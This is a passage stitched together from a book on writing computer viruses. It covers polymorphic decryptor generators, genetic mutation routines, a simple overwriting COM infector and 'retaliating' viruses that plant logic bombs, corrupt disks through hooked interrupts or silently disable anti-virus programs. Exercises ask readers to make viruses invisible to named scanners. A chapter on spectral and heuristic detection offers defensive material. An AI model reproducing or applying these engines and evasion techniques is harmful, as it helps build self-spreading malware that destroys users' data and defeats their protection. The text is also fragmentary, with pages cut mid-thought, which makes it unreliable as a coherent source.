With an encrypted virus, the only constant piece of code in the
virus is the decryptor itself. If one simply coded the virus with a
fixed decryptor at the beginning, a scanner could still obviously
scan for the decryptor. To avoid this possibility, polymorphic
viruses typically use a code generator to generate the decryptor
using lots of random branches in the code to create a different
decryptor each time the virus reproduces. Thus, no two decryptors
will look exactly alike. This is the most complex part of a polymor-
phic virus, if it is done right. Again, in the example we discuss here,
I’ve had to hold back a lot, because the anti-virus software just can’t
handle very much.
The best way to explain a decryptor-generator is to go through
the design of one, step-by-step, rather than simply attempting to
explain one which is fully developed. The code for such decryptors
generally becomes very complex and convoluted as they are devel-
oped. That’s generally a plus for the virus, because it makes them
almost impossible to understand . . . and that makes it very difficult
for an anti-virus developer to figure out how to detect them with
100% accuracy.
As I mentioned, the VME uses two different decryptor bases
for encrypting and decrypting the virus itself. Here, we’ll examine
the development of a decryptor-generator for the first base routine.
1 286+ processors have a look-ahead instruction cache which grabs code from memory
and stores it in the processor itself before it is executed. That means you can write
something to memory and modify that code, and it won’t be seen by the processor at
all. It’s not much of a problem with 286’s, since the cache is only several bytes. With
486’s, though, the cache is some 4K, so you’ve got to watch self-modifying code
closely. Typically, the way to flush the cache and start it over again is to make a call
or a near/far jump.
doesn’t need the parameter to tell us what’s off limits. This step
allows us to test the routine to see if it is putting the right number
of bytes in, etc. At this level, RAND_CODE looks like this:
;Random code generator. Bits set in al register tell which registers should
;NOT be changed by the routine, as follows: (Segment registers aren’t changed)
;
; Bit 0 = bp
; Bit 1 = di
; Bit 2 = si
; Bit 3 = dx
; Bit 4 = cx
; Bit 5 = bx
; Bit 6 = ax
;
;The cx register indicates how many more calls to RAND_CODE are expected
;in this execution. It is used to distribute the remaining bytes equally.
;For example, if you had 100 bytes left, but 10 calls to RAND_CODE, you
;want about 10 bytes each time. If you have only 2 calls, though, you
;want about 50 bytes each time. If CX=0, RAND_CODE will use up all remaining
;bytes.
RAND_CODE:
or cx,cx ;last call?
jnz RCODE1 ;no, determine bytes
mov cx,[bx][RAND_CODE_BYTES] ;yes, use all available
or cx,cx ;is it zero?
push ax ;save modify flags
jz RCODE3 ;zero, just exit
jmp short RCODE2 ;else go use them
RCODE1: push ax ;save modify flags
mov ax,[bx][RAND_CODE_BYTES]
or ax,ax
jz RCODE3
shl ax,1 ;ax=2*bytes available
xor dx,dx
div cx ;ax=mod for random call
or ax,ax
jz RCODE3
mov cx,ax ;get random betw 0 & cx
call GET_RANDOM ;random # in ax
xor dx,dx ;after div,
div cx ;dx=rand number desired
mov cx,dx
cmp cx,[bx][RAND_CODE_BYTES]
jc RCODE2 ;make sure not too big
mov cx,[bx][RAND_CODE_BYTES] ;if too big, use all
RCODE2: sub [bx][RAND_CODE_BYTES],cx ;subtract off bytes used
pop ax ;modify flags
mov al,90H ;use nops in for now
rep stosb
ret
RCODE3: pop ax
ret
mov aX,001001010B
mov cx,5
call RAND_CODE ;put random code in workspace
and so on.
Within these classifications, we can define sub-classes accord-
ing to how many bytes the instructions take up. For example, class
(1) above might include:
nop (1 byte)
push r
pop r (2 bytes)
and so on.
Potentially RAND_INSTR will need classes with very limited
capability, like (1), so we should include them. At the other end of
the scale, the fancier you want to get, the better. You can probably
think of a lot of instructions that modify at most one register. The
more possibilities you implement, the better your generator will be.
On the down side, it will get bigger too—and that can be a problem
when writing viruses, though with program size growing exponen-
tially year by year, bigger viruses are not really the problem they
used to be.
Our RAND_INSTR generator will implement the following
instructions:
Class 1:
nop
push r / pop r
Class 2:
or r,r
and r,r
or r,0
and r,0FFFFH
clc
cmc
stc
Class 3:
mov r,XXXX (immediate)
mov r,r1
inc r
dec r
That may not seem like a whole lot of instructions, but it will make
RAND_INSTR large enough to give you an idea of how to do it,
without making it a tangled mess. And it will give anti-virus
software trouble enough.
All of the decisions made by RAND_INSTR in choosing instructions
will be made at random. For example, if four bytes are
available, and the value of ax on entry tells RAND_INSTR that it
may modify at least one register, any of the above instructions are
viable options. So a random choice can be made between class 1,
2 and 3. Suppose class 3 is chosen. Then a random choice can be
made between 3, 2 and 1 byte instructions. Suppose a 2 byte
instruction is selected. The implemented possibility is thus mov
r,r1. So the destination register r is chosen randomly from the
acceptable possibilities, and the source register r1 is chosen
completely at random. The two byte instruction is put in ax, and saved
with stosw into the work space.
Generating instructions in this manner is not terribly difficult.
Any assembler normally comes with a book that gives you enough
information to make the connection between instructions and the
machine code. If all else fails, a little experimenting with DEBUG
will usually shed light on the machine code. For example, returning
to the example of mov r,r1, the machine code is:
[89H] [0C0H + r1*8 + r]
where r and r1 are numbers corresponding to the various registers
(the same as our flag bits above):
0 = ax 1 = cx 2 = dx 3 = bx
4 = sp 5 = bp 6 = si 7 = di
So, for example, with ax = 0 and dx = 2, mov dx,ax would be
[89H] [0C0H + 0*8 + 2] = [89H] [0C2H]
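Reading the encoding in the other direction is a handy way to check your arithmetic, and it is what anyone analyzing such code does anyway. The short Python sketch below decodes the two-byte register-to-register form only, assuming 16-bit operand size. The function name is illustrative.

```python
REG16 = ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]

def decode_mov_rr(code):
    """Decode a two-byte 'mov r16,r16' (opcode 89H, register-direct ModR/M).

    Returns the instruction text, or None for anything else.
    """
    opcode, modrm = code[0], code[1]
    if opcode != 0x89 or (modrm & 0xC0) != 0xC0:
        return None
    src = (modrm >> 3) & 7   # r1, the source register
    dst = modrm & 7          # r, the destination register
    return f"mov {REG16[dst]},{REG16[src]}"
```

For example, the bytes 89H 0C2H decode to mov dx,ax, in agreement with the calculation above.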
you write the push, call RAND_INSTR, and then write the pop:
mov al,11111111B
call GET_REGISTER ;get any register
pop cx ;get bytes avail
add al,50H ;push r = 50H + r
stosb
pop dx ;get register flags
push ax ;save “push r”
sub cx,2 ;decrement bytes avail
cmp cx,1 ;see if any left
jc RI02A ;nope, go do the pop
push cx ;keep cx!
call GEN_MASK ;legal to modify the
pop cx ;register we pushed
xor al,0FFH ;so work it into mask
and dl,al ;for more variability
mov ax,dx ;new register flags
call RAND_INSTR ;recursive call
RI02A:pop ax
add al,8 ;pop r = 58H + r
stosb
For the xor, the parameter for the index register is different, so we
need a routine to transform r to the proper value,
xor [R],bl = [30H] [18H + R(r)]
The second register we desire to replace is the one used to xor the
indexed memory location with. This is a byte register, and is also
coded with a value 0 to 7:
0 = al 1 = cl 2 = dl 3 = bl
4 = ah 5 = ch 6 = dh 7 = bh
So we select one at random with the caveat that if the index register
is bx, we should not use bl or bh, and in no event should we use cl
or ch. Again we code the instructions dynamically and put them in
the work space. This is quite easy. For example, in coding the
instruction add bh,0 (where 0 is set to a random number by
INIT_BASE) we used to have
mov ax,0C380H ;"add bh,
stosw
_D0RAND2 EQU $+1
mov al,0 ; ,0"
stosb
where, if r2=bl then r2’=bh, etc. To do this, you need four extra
bytes, so it’s a good idea to check RAND_CODE_BYTES first to
see if they’re available. If they are, make a decision which code you
want to generate based on a random number, and then do it. You
can also put calls to RAND_CODE between the mov/xor/mov in-
structions. The resulting code looks like this:
mov al,[bx][GD0R1] ;r1
call GET_DR ;change to ModR/M value
mov ah,[bx][GD0R2]
mov cl,3
shl ah,cl
or ah,al ;ah = r2*8 + r1
push ax
push dx
mov ax,dx
mov cx,8
call RAND_CODE
pop ax
mov cx,8
call RAND_CODE
pop ax
mov al,88H
stosw ;mov [r1],r2’
sub [bx][RAND_CODE_BYTES],4 ;must adjust this!
jmp SHORT GD3
GD3:
like this, convoluting the engine and making more and more con-
voluted code with it. Basically, that’s how it’s done. Yet even at
this level of simplicity, we have something that’s fooled some
anti-virus developers for two and a half years. Frankly, that’s a
shock to me. It tells me that some of these guys really aren’t doing
their job. You’ll see what I mean in a few minutes. First, we should
discuss one other important aspect of a polymorphic virus.
1, in which the low bit was the least significant bit, really may not
be sensitive to the non-random sequencing of that bit by the
generator.
Thus, in writing any mutation engine, it pays to consider your
random number generator carefully, and to know its limitations.
Here we will use what is known as a linear congruential
sequence generator. This type of generator creates a sequence of
random numbers X_n by using the formula
X_{n+1} = (a X_n + c) mod m
where a, c and m are positive integer constants. For proper choices
of a, c and m, this approach will give you a pretty good generator.
(And for improper choices, it can give you a very poor generator.)
The LCG32.ASM module included with the VME listed here uses
a 32-bit implementation of the above formula. Given the chosen
values of a, c and m, LCG32 provides a sequence some 2^27 numbers
long from an initial 32-bit seed. To implement LCG32 easily, it has
been written using 32-bit 80386 code.
This is a pretty good generator for the VME, however, you
could get an even better one, or write your own. There is an
excellent dissertation on the subject in The Art of Computer Pro-
gramming, by Donald E. Knuth.2
The seed to start our random number generator will come
from—where else—the clock counter at 0:46C in the machine’s
memory.
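The formula itself is easy to experiment with. The following Python sketch is only an illustration of a linear congruential generator. The constants are a commonly published textbook set (a = 1664525, c = 1013904223, m = 2^32) and are an assumption here, not the values used in LCG32.ASM.

```python
class LCG:
    """Linear congruential generator: X_{n+1} = (a*X_n + c) mod m."""

    def __init__(self, seed, a=1664525, c=1013904223, m=2**32):
        # Illustrative constants only; not taken from LCG32.ASM.
        self.a, self.c, self.m = a, c, m
        self.state = seed % m

    def next(self):
        """Advance the generator and return the new value."""
        self.state = (self.a * self.state + self.c) % self.m
        return self.state
```

With m a power of two and both a and c odd, the lowest bit of successive outputs simply alternates between 0 and 1. That is a small demonstration of why it pays to know your generator's limitations before relying on its low bits.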
Each instance of the virus should look a little different, so you can’t
test against just one copy. An anti-virus program may detect 98%
of all the variations of a polymorphic virus, but it may miss 2%. So
lots of copies of the same virus are needed to make an accurate test.
A nice number to test with is 10,000 copies of a virus. This
allows you to look at detection rates up to 99.99% with some degree
of accuracy. To automatically generate 10,000 copies of a virus,
it’s easiest to write a little program that will write a batch file that
will generate 10,000 infected programs in a single directory when
executed. This isn’t too hard to do with Many Hoops, since it’s a
non-resident COM infector that doesn’t jump directories. It’s safe
and predictable. The program 10000.PAS, listed later in this chap-
ter, generates a batch file to do exactly this. Using it, you can repeat
our tests. Your results might be slightly different, just because
you’ll get different viruses, but you’ll get the general picture.
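To see why 10,000 copies is a sensible sample size, note that a single missed sample out of n moves the measured detection rate by 1/n. The helper below is only an illustrative sketch: its name, and the use of a Wilson score interval (a standard statistical estimate, not something the tests described here used), are assumptions.

```python
import math

def detection_stats(detected, total, z=1.96):
    """Return (rate, low, high): observed detection rate and Wilson score interval."""
    p = detected / total
    denom = 1 + z * z / total
    centre = (p + z * z / (2 * total)) / denom
    half = z * math.sqrt(p * (1 - p) / total + z * z / (4 * total * total)) / denom
    return p, max(0.0, centre - half), min(1.0, centre + half)

# 9,800 detections out of 10,000 samples (a 98% scanner, as in the example above)
rate, low, high = detection_stats(9800, 10000)

# Smallest miss rate that 10,000 samples can register at all: one sample
resolution = 1 / 10000
```

With 10,000 samples the interval around a 98% rate is well under one percentage point wide, and the finest step the test can show is 0.01%.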
First, we tested F-PROT Version 2.27a, released in late 1997.
In “secure scan” mode, out of 10,000 copies of Many Hoops, it
detected 2.01% as being infected with the Tremor virus, and that
was it. So you have only 201 false alerts, and no proper detections.
In heuristics mode, F-PROT did better. It reported that 65.8%
Polymorphic Viruses 337
[Figure: diagram of the ENGINE with the labels Source, Destination, Size, VIRUS CODE, Decryptor and Encrypted Code.]
3 Unfortunately, that isn’t good enough, as you’ll learn two chapters hence.
available which will detect it, I feel fairly confident that making this
virus public will not invite rampant infection. [4]
Obviously, polymorphic viruses don’t tackle the challenges
posed by integrity checking programs or behavior checking programs,
so software like the Integrity Master [5] and Tegam Anti-Virus [6]
also does very well detecting this virus.
Memory-Based Polymorphism
Viruses need not be limited to being polymorphic only on disk.
Many scanners examine memory for memory-resident viruses as
well. A virus can make itself polymorphic in memory too.
To accomplish this task, the virus should encrypt itself in
memory, and then place a small decryptor in the Interrupt Service
Routine for the interrupt it has hooked. That decryptor can decrypt
the virus and the balance of the ISR, and then go execute it. At the
end of the ISR the virus can call a decryptor which re-encrypts the
virus and places a new decryptor at the start of the ISR.
The concept here is essentially the same as for a polymorphic
virus on disk, so we leave the development of such a beast to the
exercises.
4 Be aware, however, that there are simple modifications of the VME that will render it
invisible to both of these products. Scanners don’t work real well against intelligent
changes.
5 A shareware product available in most large shareware libraries.
6 Tegam International, 303 Potrero St. #42-204, Santa Cruz, CA 95060, Phone
(408)471-1413, www.antiv.com.
of the decryptor. All other registers except the segment registers are
destroyed.
The engine is designed so that all offsets in it are entirely
relocatable, and it can be used with any COM infecting virus. The
following module, VME.ASM, should be assembled with TASM
or MASM.
Exercises
1. Add one new class 3 instruction, which modifies one register, to the
RAND_INSTR routine.
2. Add one new class 4 instruction, which modifies two registers, to the
RAND_INSTR routine.
then warn the user that something dangerous is taking place and
allow the user to short-circuit the operation. Suspicious activity
includes attempts to overwrite the boot sector, modify executable
files, or terminate and stay resident.
The real shortcoming of such memory-resident anti-viral pro-
grams is simply that they are memory resident—sitting right there
in RAM. And just as virus scanners typically search for viruses
which have gone memory-resident, a virus could search for anti-vi-
rus programs which have gone memory-resident. There are only a
relatively few memory-resident anti-virus programs on the market,
so scanning for them is a viable option.
Finding scan strings for anti-virus programs is easy. Just load
the program into memory and use MAPMEM or some similar
program to find one in memory and learn what interrupts are
hooked. Then use DEBUG to look through the code and find a
suitable string of 10 or 20 bytes. Incorporate this string into a
memory search routine in the virus, and it can quickly and easily
find the anti-virus program in memory. The process can be sped up
considerably if you write a fairly smart search routine. Using such
techniques, memory can be scanned for the most popular memory-
resident anti-viral software very quickly. If need be, even expanded
or extended memory could be searched.
Scanning memory under Windows 95 and the like is trickier.
Generally speaking, one must use low-level system calls, e.g. to
virtual device drivers, DPMI and the BIOS, to even attempt it. One
must also be aware that not everything that is “in memory” is really
in memory. Windows is continually caching virtual memory to the
hard disk. Furthermore, even given that you know all of these
techniques, a well-written anti-virus can keep you from seeing it in
memory under Windows. Most of them aren’t well written, but this
gets way beyond the scope of this book.
One way to beat the difficulties of searching memory for
resident software in Windows is to realize that any program loaded
when Windows starts—as most resident anti-virus software will
be—will have entries in the SYSTEM.INI file or the registry
(USER.DAT and SYSTEM.DAT). So one can just search those
files for tell-tale signs of anti-virus products, and assume they’re in
memory if they’re referenced.
Once the anti-virus has been found, a number of options are
available to the virus.
Retaliating Viruses 343
Silence
A virus may simply go dormant when it’s found hostile soft-
ware. The virus will then stop replicating as long as the anti-virus
routine is in memory watching it. Yet if the owner of the program
turns his virus protection off, or passes the program along to anyone
else, the virus will reactivate. In this way, someone using anti-viral
software becomes a carrier who spreads a virus while his own
computer has no symptoms.
Logic Bombs
Alternatively, the virus could simply trigger a logic bomb when
it detects the anti-virus routine, and trash the hard disk, CMOS, or
what have you. Such a logic bomb would have to be careful about
using DOS or BIOS interrupts to do its dirty work, as they may be
hooked by the anti-viral software. The best way to retaliate is to
spend some time dissecting the anti-virus software so that the
interrupts can be un-hooked. Once un-hooked, they can be used
freely without fear of being trapped.
Finally, the virus could play a more insidious trick. Suppose an
anti-virus program had hooked interrupt 13H. If the virus scanned
and found the scan string in memory, it could also locate the
interrupt 13H handler, even if layered in among several other
TSR’s. Then, rather than reproducing, the virus could replace that
handler with something else in memory, so that the anti-virus
program itself would damage the hard disk. For example, one could
easily write an interrupt 13H handler which waited 15 minutes, or
an hour, and then incremented the cylinder number on every fifth
write. This would make a horrible mess of the hard disk pretty
quickly, and it would be real tough to figure out why it happened.
Anyone checking it out would probably tend to blame the anti-viral
software.
Dis-Installation
A variation on putting nasties in the anti-virus’ interrupt hooks
is to simply go around them, effectively uninstalling the anti-virus
program. Find the original vector which they hooked, and replace
the hook with a simple
jmp DWORD PTR cs:[OLD_VEC]
and the anti-virus will sit there in memory happily reporting that
everything is fine while the virus goes about its business. Finding
where OLD_VEC is located in the anti-virus is usually an easy task.
Using DEBUG, you can look at the vector before the anti-virus is
installed. Then install it, and look for this value in the anti-virus’
segment. (See Figure 28.1)
Of course, mixtures of these methods are also possible. For
example, a virus could remain quiet until a certain date, and then
launch a destructive attack.
An Example
The virus we’ll examine in this chapter, Retaliator II, picks on
a couple popular anti-virus products. It is a simple non-resident
[Figure 28.1: Interrupt Vector Table before and after a behavior checker is installed. Before: vector C808:0517. After: vector 19A0:095D, with the old vector stored in the behavior checker as the bytes 17 05 08 C8.]
Disk-Based Software
Designing a virus which can retaliate against software that
doesn’t go resident, like integrity checkers, is a bit more complicated.
Under DOS, it usually isn’t feasible to scan an entire hard
disk for a disk-based program from within a virus. The amount of
time and disk activity it would take would be a sure cue to the user
that something funny was going on. Since the virus should remain
as unnoticeable as possible—unless it gets caught—another
method of dealing with integrity checkers is desirable. If, however,
sneaking past a certain integrity checker is a must, a scan is
necessary. To shorten the scan time, it is advisable that one start the
scan by looking in its default install location.
Alternatively, one might just look in its default location. That
doesn’t take much time at all. Although such a technique is obviously
not foolproof, most users (stupidly) never think to change
even the default directory in the install sequence. Such a default
search could be relatively fast, and it would allow the virus to knock
out the anti-virus the first time it gained control.
Another method to detect the presence of an integrity checker
is to look for tell-tale signs of its activity. For example, Microsoft’s
VSAFE program leaves little CHKLIST.MS files in
Security Holes
Some of these integrity checkers have gaping security holes
which can be exploited by a virus. For example, guess what VSAFE
does if something deletes the CHKLIST.MS file? It simply rebuilds
it. That means a virus can delete this file, infect all the files in a
directory, and then sit back and allow VSAFE to rebuild it, and in
the process incorporate the integrity information from the infected
files back into the CHKLIST.MS file. The user never sees any of
these adjustments. VSAFE never warns him that something was
missing. (Note that this works with Central Point Anti-Virus too,
since Microsoft just bought CPAV for DOS.)
Some of the better integrity checkers will at least alert you that
a file is missing, but if it is, what are you going to do? You’ve got
50 EXEs in the directory where the file is missing, and you don’t
have integrity data for any of them anymore. You scan them, sure,
but the scanner turns up nothing. Why was the file missing? Are
any of the programs in that directory now infected? It can be real
hard to say. So most users just tell the integrity checker to rebuild
the file and then they go about their business. The integrity checker
may as well have done it behind their back without saying anything,
for all the good it does.
Logic Bombs
If a virus finds an anti-virus program like an integrity checker
on disk, it might go and modify that integrity checker. At a low
level, it might simply overwrite the main program file with a logic
bomb. The next time the user executes the integrity checker . . .
whammo! his entire disk is rendered useless. Viruses like the
Cornucopia use this approach.
A more sophisticated way of dealing with it might be to
disassemble it and modify a few key parts, for example the call to
the routine that actually does the integrity check. Then the integrity
checker would always report back that everything is okay with
everything. That could go on for a while before a sleepy user got
suspicious. Of course, you have to test such selective changes
carefully, because many of these products contain some self-checks
to dissuade you from making such modifications.
Exercises
1. Modify the Retaliator II so that it computes the end of the file using the
EXE header. In this way, it will overwrite any information added to it
by a program like SCAN. This will make the program just infected look
like a file that never had any validation data written into it. Test it and
see how well it works against SCAN.
2. Can you find any other anti-anti-virus measures that might be used
against Flu Shot Plus?
4. A virus which infects files might encrypt the host, or scramble it, and
decrypt or unscramble it only after finished executing. If an anti-virus
attempts to simply remove the virus, one will be left with a trashed host.
Can you devise a way to do this with a COM infector? with an EXE
infector?
5. A virus might remove all the relocatables (or even just a few) from an
EXE file and stash them (encrypted, of course) in a secret data area that
it can access. It then takes responsibility for relocating those vectors in
the host. If the file is disinfected, all the relocatables will be gone, and
the program won’t work anymore. If you pick just one or two relocat-
ables, the program may crash in some very interesting ways. Devise a
method for doing this, and add it to the Retaliator II.
Chapter 29
Advanced Anti-
Virus Techniques
Source code for this chapter: \ANTI\FINDVME.PAS
\ANTI\FREQ.PAS
We’ve discussed some of the cat-and-mouse games that viruses
and anti-virus software play with each other. We’ve seen how
protected mode presents some truly difficult challenges for both
viruses and anti-virus software. We’ve discussed how it can be just
plain dangerous to disinfect an infected computer. All of these
considerations apply to detecting and getting rid of viruses that are
already in a computer doing their work.
One subject we haven’t discussed yet is just how scanners can
detect polymorphic viruses. At first glance, it might appear to be
an impossible task. Yet, it’s too important to just give up. A scanner
is the only way to catch a virus before you execute it. As we’ve
seen, executing a virus just once could open the door to severe data
damage. Thus, detecting it before it ever gets executed is important.
The key to detecting a polymorphic virus is to stop thinking in
terms of fixed scan strings and start thinking of other ways to
characterize machine code. Typically, these other ways involve an
algorithm to analyze code rather than merely search it for a pattern.
As such, I call this method code analysis. Code analysis can be
broken down into two further categories, spectral analysis, and
heuristic analysis.
Spectral Analysis
Any automatically generated code is liable to contain tell-tale
patterns which can be detected by an algorithm which understands
those patterns. One simple way to analyze code in this manner is to
search for odd instructions generated by a polymorphic virus which
are not used by ordinary programs. For example, both the Dark
Avenger’s Mutation Engine and the Trident Polymorphic Engine
often generate memory accesses which wrap around the segment
boundaries (e.g. xor [si+7699H],ax, where si=9E80H). That’s not
nice programming practice, and most regular programs don’t do it.
Technically, we might speak of the spectrum of machine in-
structions found in a program. Think of an abstract space in which
each possible instruction, and each possible state of the CPU is
represented by a point, or an element of a set. There are a finite
number of such points, so we can number them 1, 2, 3, etc. Then,
a computer program might be represented as a series of points, or
numbers. Spectral analysis is the study of the frequency of occur-
rence and inter-relationship of such numbers. For example, the
number associated with xor [si+7699H],ax, when si=9E80H,
would be a number that cannot be generated, for example, by any
known program compiler.
Any program which generates machine language code, be it a
dBase or a C compiler, an assembler, a linker, or a polymorphic
virus, will generate a subset of the points in our space.
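The idea that a code generator covers only a subset of the space can be sketched with a much cruder "spectrum": the set of byte values that appear in a block of data. A real spectrum analyzer would decode whole instructions together with CPU state; the function names and the tiny three-value profile below are hypothetical and only illustrate the subset test from the scanner's side.

```python
from collections import Counter

def byte_spectrum(data):
    """Relative frequency of each byte value that occurs in data."""
    counts = Counter(data)
    total = len(data)
    return {value: n / total for value, n in counts.items()}

def outside_profile(data, profile):
    """Byte values present in data that the profiled generator never emits."""
    return sorted(set(data) - set(profile))

# Hypothetical profile: a generator that only ever emits these three byte values.
profile = {0x90, 0xB8, 0xC3}
sample = bytes([0x90, 0x90, 0xB8, 0xF5, 0xC3])   # 0xF5 is the cmc opcode
spectrum = byte_spectrum(sample)
strangers = outside_profile(sample, profile)      # [0xF5]
```

Any value in strangers is a point outside the profiled generator's subset, which is evidence that the sample did not come from that generator.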
Typically, different code-generating programs will generate
different subsets of the total set. For example, a C compiler may
never use the cmc (complement carry flag) instruction at all. Even
assemblers, which are very flexible, will often generate only a
subset of all possible machine language instructions. For example,
they will often convert near jumps to short jumps whenever possi-
ble, and they will often choose specific ways to code assembler
instructions where there is a choice. For example, the assembler
instruction
mov ax,[7900H]
[Figure: two frequency plots, one with Avg.=0.0039 and Std. Dev.=0.0087, the other with Avg.=0.0039 and Std. Dev.=0.0038.]
Heuristic Analysis
Heuristic analysis basically involves looking for code that does
things that viruses do. This differs from a behavior checker, which
watches for programs doing things that viruses do. Heuristic analy-
sis is passive. It merely looks at code as data and never allows it to
execute. A heuristic analyzer just looks for code that would do
something nasty or suspicious if it were allowed to execute.
instead.
Now, if you had a full-blown spectrum analyzer, it would be
able to decode all possible instructions. FINDVME doesn’t do that.
Supposing you had such an analyzer, though. If an instruction were
encountered that, say, was characteristic of the Trident Polymorphic
Engine, but not the Visible Mutation Engine, then the
NOT_VME flag would get set, but the NOT_TPE flag would not be
touched. The heuristic analysis could continue at the same time the
spectrum analyzer was working. Even if all the spectral flags were
set, to indicate no known virus, the parameters generated by the
heuristic analysis could still warrant comment.
For example, if the above instructions added 10H to modified,
and the complementary mov al,[si], etc., added 1 to modified,
then one could examine the modified array for, say, more than
10 contiguous locations where modified[x]=11H.
If there were such bytes, one could raise a flag
saying that the program contains self-decrypting code, possibly
belonging to a virus.
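The contiguous-run test just described can be sketched as follows. The array name modified comes from the text; the function name, the default threshold of 10 and the sample data are assumptions for illustration, and this is not FINDVME's actual code.

```python
def has_decrypt_run(modified, flag=0x11, min_run=10):
    """True if more than min_run contiguous entries of modified equal flag."""
    run = 0
    for value in modified:
        run = run + 1 if value == flag else 0
        if run > min_run:
            return True
    return False

# 16 bytes that were both read (+1) and written (+10H), surrounded by untouched bytes
modified = [0] * 32 + [0x11] * 16 + [0] * 32
suspicious = has_decrypt_run(modified)
```

Requiring a run rather than a single flagged byte keeps an ordinary program that updates one variable in place from raising the flag.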
Exercises
1. Fix FINDVME to handle VME-based virus infections which start with
a jump instruction.
4. Write a program which will search for code attempting to open EXE
files in read/write mode. It need not handle encrypted programs. How
well does it do against some of the viruses we’ve discussed so far?
Chapter 30
Genetic Poly-
morphic Viruses
Source Code for this Chapter: \GENETIC\MANYHOOPS.ASM
gets 5 bits from GENE and reports them in ax. It also updates the
GENE_PTR by 5 bits so the next call to GET_RANDOM gets the
next part of the gene.
Genetic Mutation
As long as the gene remains constant, the virus will not change.
The children will be identical to the parents. To make variations,
the gene should be modified from time to time. This is accom-
plished using the random number generator to occasionally pick a
bit to modify in the routine MUTATE. Then, that bit is flipped. The
code to do this is given by:
in al,40H ;get a random byte
cmp [MUT_RATE],al ;should we mutate?
jc MUTR ;nope, just exit
push ds
xor ax,ax
mov ds,ax
mov si,46CH ;get time
lodsd
pop ds
mov [RAND_SEED],eax ;seed rand # generator
call GET_RAND
mov cx,8*GSIZE
xor dx,dx
div cx
mov ax,dx
mov cx,8
xor dx,dx
div cx ;ax=byte to toggle, dx=bit
mov cl,dl
dec cl ;cl=bits to rotate
mov si,ax
add si,OFFSET GENE ;byte to toggle
mov al,1
shl al,cl
xor [si],al ;toggle it
MUTR:
Darwinian Evolution
Using a gene-like construct also opens the door to Darwinian
evolution. The virus left to itself cannot determine which of these
10^241 possible configurations will best defeat an anti-virus. However,
when an anti-virus is out there weeding out those samples
which it can identify, the population as a whole will learn to evade
the anti-virus through simple Darwinian evolution.
This book is not the place to go into a lot of detail about how
evolution works or what it is capable of. All I intend to do here is
demonstrate a simple example. The interested reader who wants
more details should read my other book, Computer Viruses, Artifi-
cial Life and Evolution. For now, suffice it to say that any self-re-
producing system which employs descent-with-modification will
be subject to evolution. Any outside force, like an anti-virus prod-
Real-World Evolution
Now, I don’t know what you think of real-world evolution, the
idea that all of life evolved from some single-celled organism or
some strand of DNA or RNA. As a scientist, I think these claims
are pretty fantastic. However, we can watch some real real-world
evolution at work when we pit our new, souped-up Many Hoops
virus, which I’ll call Many Hoops-G, against anti-virus software.
You can use any anti-virus you like, be it the FINDVME
program from the last chapter, or another. (I purposely left a hole
in FINDVME so you can demonstrate Darwinian evolution with it.
I hope you did the exercise at the end of the last chapter to learn
what the hole is and why it’s much better to disassemble a poly-
morphic engine and figure out how it works than to simply test
against lots of samples.) You can demonstrate evolutionary behav-
ior as long as the anti-virus doesn’t detect 0% of the samples (no
evolutionary pressure) or 100% of the samples (too much pressure).
The closer the anti-virus gets to 100%, the more dramatic the
results.
For the purposes of this example, I’ll use McAfee’s Scan, since
it is the best scanner for Many Hoops that is less than 100% accurate
(it comes in at about 99.9%). Other scanners I’ve mentioned, e.g.
Dr. Solomon and F-PROT, detect a subset of what McAfee does,
so if Many Hoops can evade the former, it will evade the latter as
well.
Anyway, out of a sample of 10,000 copies of Many Hoops-G,
Scan 3.15 detected all but 9 instances of the virus, or 99.91%.
Taking the 9 instances which were not detected and using them to
make 9000 second generation samples, 1000 for each parent, Scan
detected only 89 instances of the virus. In other words, in one
generation, it went from a 99.91% detection rate to a 0.98%
detection rate—almost a complete reversal! Subsequent genera-
tions reduce that detection rate even further.
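The two percentages quoted above follow directly from the sample counts. The short check below is only a worked calculation; the helper name is hypothetical.

```python
def percent(part, whole):
    """Percentage of whole represented by part."""
    return 100.0 * part / whole

gen1 = percent(10000 - 9, 10000)   # first generation: all but 9 of 10,000 detected
gen2 = percent(89, 9000)           # second generation: 89 of 9,000 detected
```

Here gen1 is 99.91 and gen2 is just under 0.99, which the text reports truncated as 0.98%.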
I hope you can see the implications of this. Clearly, evolution
can play havoc with scanners! In only one generation, evolution
Exercises
1. Play around with the genetic version of Many Hoops and figure out a
way to make it invisible to Thunderbyte, or your favorite scanner.
The following two exercises will help you create two tools
you’ll want to have to play around with evolutionary viruses. In
addition to these, all you’ll need is a scanner that can output its
results to a file, and a text editor. (Take the scanner output and edit
it into a batch file to delete all of the files it detects.)
2. Modify the 10000.PAS program from two chapters back to create a
test-bed of first generation viruses from the assembled file MANY-
HOOP.COM. To do that, every host file 00001.COM, etc., must be
infected directly from MANYHOOP.COM instead of the file before it.
1 See, for example, Siegfried Scherer, “Basic types of life” in S. Scherer, ed., Typen
des Lebens (Pascal-Verlag, Berlin:1993) pp.11-30.
Evolution or De-Evolution? 375
power they have. But if you try to program a virus that creates
complexity out of random chance2, and then try to really get it to
do anything meaningful, you’ll see what I mean. The de-evolution-
ary virus is completely logical, and completely predictable, and it
works. The creative evolutionary virus you create will probably be
all but impotent. Certainly, this will give you something to think
about. I leave the inference to you to draw or not to draw as you see
fit.
A De-Evolutionary Virus
The genetic Many Hoops virus in the last chapter was pro-
grammed in such a way that it neither gained nor lost complexity.
It retained all of its original code, and all of its complexity. The
gene it contained was merely used to make decisions about how to
camouflage itself. The problem with it is that if an anti-virus
developer gets a hold of it and disassembles it, they can easily
devise a program to detect every instance of it.
A truly de-evolutionary virus is not subject to such analysis.
When an anti-virus developer gets a hold of a devolved example of
the virus, he can only—at best—learn how to detect a subset of the
original creation. If it has devolved all the way, he can only learn
how to detect a single example of it. So he is stuck collecting
individual samples of devolved viruses, and he can’t get back to the
original logic that is creating them to begin with. If he could analyze
that logic, he might be able to write an algorithm that discovers it.
That is impossible without the original prototype virus, though.
To illustrate these ideas, let’s create a very simple example of
a de-evolutionary virus. The devolved virus will be a simple over-
writing COM infector like the MINI-44 (line numbers are for later
reference):
1 : SIMPLE_START: ;starting point for simple virus
2 : mov dx,OFFSET COM_FILE
3 : mov ah,4EH ;search for *.COM (search first)
2 To do this, write a small virus that randomly flips any one (or more than one) of its
bits now and then, and which can randomly add a byte somewhere in its code. Create
a bunch of samples of it, and see how many of them still reproduce. Create a second
generation, and so on. See if you can come up with anything that is functionally better
than what you started with. (Lots of luck!)
4 : int 21H
5 : SEARCH_LP:
6 : jc DONE
7 : mov ax,3D01H ;open file we found
8 : mov dx,FNAME
9 : int 21H
